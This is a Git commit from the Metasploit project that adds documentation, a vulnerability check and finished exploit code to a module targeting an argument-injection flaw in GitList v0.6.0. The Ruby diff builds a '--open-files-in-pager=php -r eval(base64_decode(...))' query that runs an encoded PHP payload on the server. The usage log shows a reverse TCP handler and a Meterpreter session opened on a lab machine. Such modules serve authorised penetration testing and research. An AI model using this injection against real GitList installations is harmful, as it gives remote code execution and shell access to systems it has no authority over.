added documentation and check

GSoC/Meterpreter_Web_Console
Shelby Pace 2018-07-05 15:47:21 -05:00
parent 507fd22958
commit 2b452d5681
No known key found for this signature in database
GPG Key ID: B2F3A8B476406857
2 changed files with 57 additions and 32 deletions

View File

@ -0,0 +1,37 @@
## Vulnerable Application
This module exploits an argument injection vulnerability in GitList v0.6.0
## Verification Steps
1. Install the application
2. Start msfconsole
3. Do: `use [exploit/multi/http/gitlist_arg_injection]`
4. Do: `set RHOSTS [IP]`
5. Do: `run`
6. You should get a session.
## Scenarios
### Tested on Ubuntu 18.04 x64
```
msf5 > use exploit/multi/http/gitlist_arg_injection
msf5 exploit(multi/http/gitlist_arg_injection) > set rhosts 192.168.37.141
rhosts => 192.168.37.141
msf5 exploit(multi/http/gitlist_arg_injection) > check
[+] 192.168.37.141:80 The target is vulnerable.
msf5 exploit(multi/http/gitlist_arg_injection) > run
[*] Started reverse TCP handler on 192.168.37.1:4444
[*] Sending stage (37775 bytes) to 192.168.37.141
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.141:35804) at 2018-07-05 14:22:39 -0500
meterpreter > sysinfo
Computer : ubuntu
OS : Linux ubuntu 4.15.0-20-generic #21-Ubuntu SMP Tue Apr 24 06:16:15 UTC 2018 x86_64
Meterpreter : php/linux
meterpreter >
```

View File

@ -10,9 +10,10 @@ class MetasploitModule < Msf::Exploit::Remote
def initialize(info={})
super(update_info(info,
'Name' => "[Vendor] [Software] [Root Cause] [Vulnerability type]",
'Name' => "Gitlist v0.6 Argument Injection",
'Description' => %q{
Say something that the user might need to know
This module exploits an argument injection vulnerability in Gitlist v0.6.
The vulnerability arises from GitList improperly validating input using the php function, 'escapeshellarg'.
},
'License' => MSF_LICENSE,
'Author' => [ 'Kacper Szurek', # EDB POC
@ -20,40 +21,18 @@ class MetasploitModule < Msf::Exploit::Remote
],
'References' =>
[
[ 'EDB', '44548' ]
[ 'EDB', '44548' ],
[ 'URL', 'https://security.szurek.pl/exploit-bypass-php-escapeshellarg-escapeshellcmd.html']
],
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' =>
[
[ 'System or software version',
{
'Ret' => 0x41414141 # This will be available in `target.ret`
}
]
[ 'Gitlist v0.6', { } ]
],
'Payload' =>
{
'BadChars' => "\x20"
},
'Privileged' => false,
'DisclosureDate' => "Apr 26 2018",
'DefaultTarget' => 0))
end
def make_request
postUri = normalize_uri(target_uri.path, '/gitlist/tree/c/search')
php = %Q|<?php #{payload.encoded} ?>|
cmd = '--open-files-in-pager=php -r "eval(base64_decode(\\"'
cmd << "#{Rex::Text.encode_base64(payload.encoded)}"
cmd << '\\"));"'
postRes = send_request_cgi(
'method' => 'POST',
'uri' => postUri,
'vars_post' => { 'query' => cmd }
)
end
def check
@ -63,15 +42,24 @@ class MetasploitModule < Msf::Exploit::Remote
'uri' => uri
)
unless res
return Exploit::CheckCode::Safe
if res && res.code == 200 && /Powered by .*GitList 0.6.0/.match(res.body)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Detected if res.code == 200
return Exploit::CheckCode::Unknown
end
def exploit
make_request
end
postUri = normalize_uri(target_uri.path, '/gitlist/tree/c/search')
cmd = '--open-files-in-pager=php -r "eval(base64_decode(\\"'
cmd << "#{Rex::Text.encode_base64(payload.encoded)}"
cmd << '\\"));"'
postRes = send_request_cgi(
'method' => 'POST',
'uri' => postUri,
'vars_post' => { 'query' => cmd }
)
end
end